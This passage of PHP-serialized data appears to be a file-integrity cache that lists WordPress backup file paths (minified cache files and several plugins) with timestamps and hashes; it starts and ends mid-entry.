aa49035b688247403098fa3165/1416510079index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"76df2a7aef6a7a8d7722abec6830829f";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/a6c8aa2ef523db7ad0cd0ceb57c4c0e6/1406733236index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"a6c8aa2ef523db7ad0cd0ceb57c4c0e6";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/a9194fd70abfaf6b1708f88af50a046a/1412909491index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"a40bf872dfceda39d1fca1dcac401832";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/a9e6ce5384735242b8799797e25c8f00/1416510079index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"359136881bc0aaab71b2e5d2b808ccdc";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/aa05e0363db197d7c61283ed201fd731/1416510080index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"cc599f82d1eb2ee5aefa55e1dc3058f6";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/aa742655bfdead096d2a51e30c424c14/1406733236index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"501aab813dd26ea84662057a559880ec";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/aac106bc465490ece4b6da67ea11c41a/1406733236index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"6b60966c131001a864fd715939c73eaa";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/ab342000333dbefe5afa3d3a50131e0e/1416510080index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"ee7584e644d16acb1485bba97342772d";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/abec66b2eb6f7bb074d5958929174c57/1418167131index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"daee9246e1fef465404a25ea6130bae4";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/ad557ce0ab10704dc8e859ab34375e0b/1407360442index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"c2ab20053f98a14bfcdcfb8d3a6617ae";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/afc4ebe70ca3ed14ab1c22259b454032/1416510080index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"2521fe454e70ac2c72839082582d7bc9";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/b02254eb18734ecc12e4d4bdeac48f3f/1416510078index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"4c860d2715e46b0f262af2c3fad7fdda";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/b05bee0ff23d6d38f7b2ea6268ac69f2/1416510078index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"0511dbbf958ff1840860ff7ca095043a";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/b09e5dde7352d3b90677da9878966981/1416510078index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"501aab813dd26ea84662057a559880ec";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/b0bf41ad27d706b145b26cdaf00456d0/1407360441index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"ebca820ddd68c3e9744f4660917d5c0b";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/b2bbbc233909e40441684fb69ae415b5/1412743440index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"ada4b004976438a9c433f11b54331ca2";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/b3c70a7bdd4b1dc9bd45ea5836739f43/1414163423index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"766d473f0063f9374ee8e47a2aa5079a";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/b6aff3c686dccd06f81596d414af3aac/1416510078index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"f9bd392712313f758f022045c12e4628";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/b7f9608b6116c2deb1cb7595e62ed4f5/1406733242index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"5ba655f7eb4a25480a3822263cc2e1b1";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/b919476c150a3f5cbe6c13240033d539/1412916711index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"704cf2e770c9276d7b057e48dc3216f4";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/bab4a7c690e0d96bf1591cc43d6fb80e/1412661521index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"bab4a7c690e0d96bf1591cc43d6fb80e";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/bc46469aae11bdfca18af4e5b973c592/1418166115index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"49a607ecdd0ba0e790663c9310254a10";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/bd1b3f3dbe80ded7dcb663b20a32c7e9/1416510078index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"8f60dd32197db0de0e5bcb25b44cdfac";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/bebdad656306c8900ce0c35fa82519d7/1416510078index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"4a46463c58d4312e0f9c388e1fc5d92a";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/befecd1165f256a377e5a2166773d61b/1412743444index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"59bb47d1155afd7ac9cf2f08d5b8632f";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/bf127b4193e990a987ef17baf360932d/1416510078index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"b51debd0412152e3d1d52810004989b0";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/bfc870348c98601d53f431afad4fefa0/1406733243index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"1cac4e0ccc27bfcd55894ae887172b18";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/bfdaeed52f68834448d99f0ad0ac359c/1416510079index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"04b23287d6faf7ef0ef778c42b69e894";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/c0695fa4d56b0e74aa8e9cb367c2a85c/1407360441index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"4a46463c58d4312e0f9c388e1fc5d92a";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/c1fd0ae0b1c610261c405cb0af870d64/1407173260index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"70a881c79e8d41341e79a88e448b353d";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/c2f76d8e61594ca1a89d3ed494aa4c37/1412743441index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"3610b338857f074bab7ce104580e0ac4";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/c31e4749daa6290a3b2e404a5d50acd5/1412748157index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"09926f6f8dd39855d4e5fb2907000ce2";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/c725d7090009521cc4d426bfae6aeb97/1412667969index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"c725d7090009521cc4d426bfae6aeb97";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/c7aa7ecbcbe4f347a29925f0f2b74ab6/1406733236index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"73f3c5c89b11a92119def0fc2b2de003";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/c8f328c8d2c2b1057f30ee243b2ab423/1416452473index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"be2dce000ca616c09f5cd802eeb8b936";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/c9fae88292a4484c261477c3032a2d04/1406733236index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"84be265979d1734321ae794a55990da9";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/caacb56970d39586114e12ccc6990800/1406733237index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"398d87e012f8f94ba78e25f34c5bd3e7";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/cbdc4456a74b05697467b6a5ecfd4471/1406733236index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"6b9016086e0133931f5fbd780efc5ebb";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/cc57be9a107d8eeb9b440b908b735a95/1407360441index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"d43f8506570aecb66b505a38dd675d83";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/ce7a355fd5509af69460cc53c4e42a83/1416510080index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"170bb4eeb75321f3f2cf4d6c803c7f5c";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/cebf6be32cd24eaea628ad9427631a37/1416460124index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"7b4dfade4fd5fe9f775a3a4d52144de4";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/cf2bd9d3f75479553eabb578094b8929/1406733237index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"bb0e7d0ce1244e0f294730141b3ce223";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/cf9b5a1f04f2694dda9240628dde177d/1412916230index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"da36b176b3a2e2058a9b1f142f7cc74a";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/cfe674f097ea5eb38819ee2b05703a0d/1407360442index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"9bed3aa78b0c5a606fc5159c729ca69e";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/d062e2f93ec94c97231b1a0fb24ccefc/1412916710index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"d062e2f93ec94c97231b1a0fb24ccefc";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/d08f023e29334f48b6d542e118a38b40/1406733242index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"b7582d6f47dbdb6ecf82ac34147e80ca";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/d0bcce6a0c00683efc3b07701bc3532d/1416510079index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"8a6171823a47576980e8b4e6fc6f3ebd";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/d1766c3231643d4408dfadb833df706a/1416510078index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"6b60966c131001a864fd715939c73eaa";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/d26064b34cf8a450f53cdc1114cfa8a5/1412667969index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"489cc3b73f3020d21cd825160b26275e";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/d3c6787192cbc5f0e1727dfb09e90215/1416460124index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"611d091f8da1f6ccb552f6f937667767";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/d7c8fb06b740092bd207ad1f0061cf50/1407360441index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"ee4b90f4ba50a536726316421b3312eb";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/d8187228e0c56c22a9073a44aae51090/1406733240index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"c7d29c9351d3dd680c6dc897e78fe4e2";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/d873e67c71c35d5453f746b4dc0d2d5d/1412660161index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"96dcdf6ecb883f1218d329670c042fc6";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/d9f6d2505db79d73d97fc8152907ea81/1416510079index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"8d18a8ed108458ded31b4c584bafd3b3";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/dae2af34108eb9cdb87283a893d35e7f/1407360441index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"8f60dd32197db0de0e5bcb25b44cdfac";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/ddf4c1bd6683aef9f802f3d6477996bb/1412743444index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"4a75c09cf3a80d203e5452bf46ab7cae";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/de162e316f4cf3486e7e2fb5695ad537/1407360441index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"16960fb2bb1c46333ca63b1fb7ae0a7a";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/dee38c2037ad990cd791b65009a40aca/1412664877index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"70c4a30e51f2334f323b2902fc346745";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/e2f52ac584d71cd65ca4f4c55278c251/1412916711index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"cec86803e17f7109767b3f15f4979831";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/e3f538fa65309cf4dee467660ab6b3d3/1407173260index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"01c92f786917febb3190e23515191d9a";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/e6681dd48df6a3391c6386b3248f2993/1407360441index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"462481cf80a7b61cb3acf115986d5485";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/e719fbdcd638c9c95f66626044b02f9f/1416510080index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"df778ca310da8afac641a133ed18bd20";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/ea521ecfe6537b04d8bd10e09c7bdde2/1412909491index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"4c3326e96fd50b9a1b7e7701f5cea053";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/eb7dbb858ba82deb3067e145fcfb16d7/1416510078index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"6043fb0bd64a2be47525495751206432";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/ec2080c9a9a3e4005834d2a73169e21f/1416510078index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"ada4b004976438a9c433f11b54331ca2";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/ecc130bb589af596d071f98346e88991/1416510078index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"6b9016086e0133931f5fbd780efc5ebb";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/ed95626e4b3cb0bbf026bc0d11d94e44/1406733238index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"b95f7a518c4a3ec2a3fccf2971005ac9";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/ee1bd62009d63d6eaa13abb9da938e4b/1406733236index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"91e07d785ac7bbf2c8e855a3369237e6";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/eef532761a1b39d4d48a40971cd629f3/1416526466index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"3c75adf382ea69e21597467caa3cd85d";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/eef5b612f212a9e662869c6e293468c5/1416452473index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"404e8794caafaed41ec6c01dc751bdd8";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/efdb28b7e68557c4c95e85f8eb6e7ed6/1412660238index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"c9a2b938f855d5b8395d43e639a40e18";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/f08e67cd93ce7345ff38a0e6b03c16b9/1406733236index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"4a46463c58d4312e0f9c388e1fc5d92a";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/f0e8805b96af9af76afb2df2580c4f61/1416510079index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"5f6bb443316ca76b9131a5dddf87e02a";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/f1b41d3bd9fdf6e4582e266f89485415/1407360441index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"76cbb2bf2d62378c41477f1d1a096d7f";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/f3791bd27170c23a8371544c6edf3706/1406733241index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"e612a727c25961baf59caebd0f335d79";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/f47b75befd9e25e89f209d6e43bf9fd0/1407360442index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"2e419c92311e7a78208f70c84d93a95d";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/f65331ec092d3432799e48f9c86ead7e/1412909490index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"f65331ec092d3432799e48f9c86ead7e";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/f782ce90788ddd55b8a96484b77695b1/1406733239index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"50c1c2f4d9bfda7389da6645de4fc143";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/fa7f9bfa527ff74f9e3133ddc27744e3/1416526466index.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"c504de12b5eca0163042a2a9de98f2d4";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/cache/wpfc-minified/ff93178c934cd7246942f6ea1c14821e/1406733239index.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"cd158c446ce0ddcda9baeb8a17dbd092";}s:63:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/index.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"67442c5615eba73d105c0715c6620850";}s:61:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/php.ini";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"00f203fcdf8d136b1e3dcb54f1bac353";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/Ready-USAepay/install.xml";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"c861a8bc42c4a2f0b51cc99b62d1c55e";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/Ready-USAepay/install_orig.xml";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"e0ae806c9fc3a792d566a1995b2b7eee";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/Ready-USAepay/usaepay/controller.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"208e0ac64749e89c79248135df2e32b8";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/Ready-USAepay/usaepay/mod.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"2f7b2e08e361b84b9b902d472a238fc3";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/Ready-USAepay/usaepay/mod.xml";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"db167c54e2f339c798080ae482bab659";}s:102:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/Ready-USAepay/usaepay/views/tpl/form.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"69ff8a9d9350ff78e25e99bf70afe00d";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/Ready-USAepay/usaepay/views/usaepay.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"0be41364c2f6cac8fd4ffd8bbb071def";}s:96:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/Ready-USAepay/usaepay-payments.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"db51225614ea901f8205a6537d427a65";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/Ready-USAepay/wpUpdater.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"563a5823fce2d59f038e6f3c0c2872c3";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/.gitignore";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"f6d6a767f595c2f1c14adb20c44d1c41";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/README.md";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"0baccfeab622fbee61ed8c9d3ea52cc5";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/all-in-one-favicon.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"c5632ab70566f809e2985f306b621c20";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/images/ajax-loader.gif";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"cf46f7db4c452ea2a94d33eabca8ba93";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/aio-favicon-backend.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"63fd9ceb4a267fc624a5d2699f499f9b";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/aio-favicon-frontend.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"8e069141142e09ff52e53ef6b8290dbc";}s:102:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/debugger.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"7db33bedaf2881d395b2b1a3c3d566b5";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/donationloader.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"68e8f8b68e42df7204b8d1c2842cc88a";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/favicon-render-helper.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"f5a1b372603127864596b6fae62d6c6b";}s:126:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/settings-page/sp-delete-settings.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"794dd93a701031fc038dc31f503ce28f";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/settings-page/sp-donate-box.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"05f161b9ad01e603b7f267c4a9afc488";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/settings-page/sp-donations.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"6867e058acb13fb4364eabf04b9854f4";}s:117:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/settings-page/sp-footer.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"cfc0a0fa86ea00ead5025881a487e7f8";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/settings-page/sp-left-column.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"218eeec8d935d14430c63b3a9ed6edfa";}s:134:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/settings-page/sp-plugin-favicon-settings.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"f1ad97357fc25510a7e6e5baed948d70";}s:131:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/settings-page/sp-plugin-meta-settings.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"89b88f5083b0fe53ab521822dafbf6bc";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/settings-page/sp-right-column.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"a58e4c749f252125c77525a0262bf536";}s:120:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/settings-page/sp-tipps-box.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"63feb5d712ada3e2ee4e89955235d265";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/settings-page/sp-translation.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"aeec75d1175de8560237c18bc4541123";}s:107:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/includes/settings-page.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"1b7a00dcd9c49a406e52b2cb773077a5";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/js/aiofavicon-min.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"6847845788b96db874dc7de3cee8849c";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/js/aiofavicon.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"51ec127df613808b7a676673efe1ecb9";}s:99:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/js/donation-min.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"d87a7cf2eec598eae4eb4c12b42e7130";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/js/donation.js";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"5f1bbdab6be90fd8506cf6648da7a058";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/all-in-one-favicon/readme.txt";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"c41b8c9c525da7c095d5f97b815e102a";}s:121:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/black-studio-tinymce-widget/black-studio-tinymce-widget.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"7a2002bc0a63a59b6c65c8e38bca20be";}s:131:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/black-studio-tinymce-widget/css/black-studio-tinymce-widget-pre33.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"cae09f31ae3f13171ba18a833783f5c6";}s:135:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/black-studio-tinymce-widget/css/black-studio-tinymce-widget-pre33.min.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"2cedc2b5b2328934cd41dd35860d5050";}s:125:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/black-studio-tinymce-widget/css/black-studio-tinymce-widget.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"9a5ee0b6f127d2a6effb52cea80a8049";}s:129:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/black-studio-tinymce-widget/css/black-studio-tinymce-widget.min.css";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"32e5f5a89212ad0fd17c942f2d5e67bd";}s:114:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/plugins/black-studio-tinymce-widget/includes/class-admin.php";a:2:{s:1:"d";i:1517159293;s:1:"h";s:32:"f51ef2bf6a242498bb6785d38e8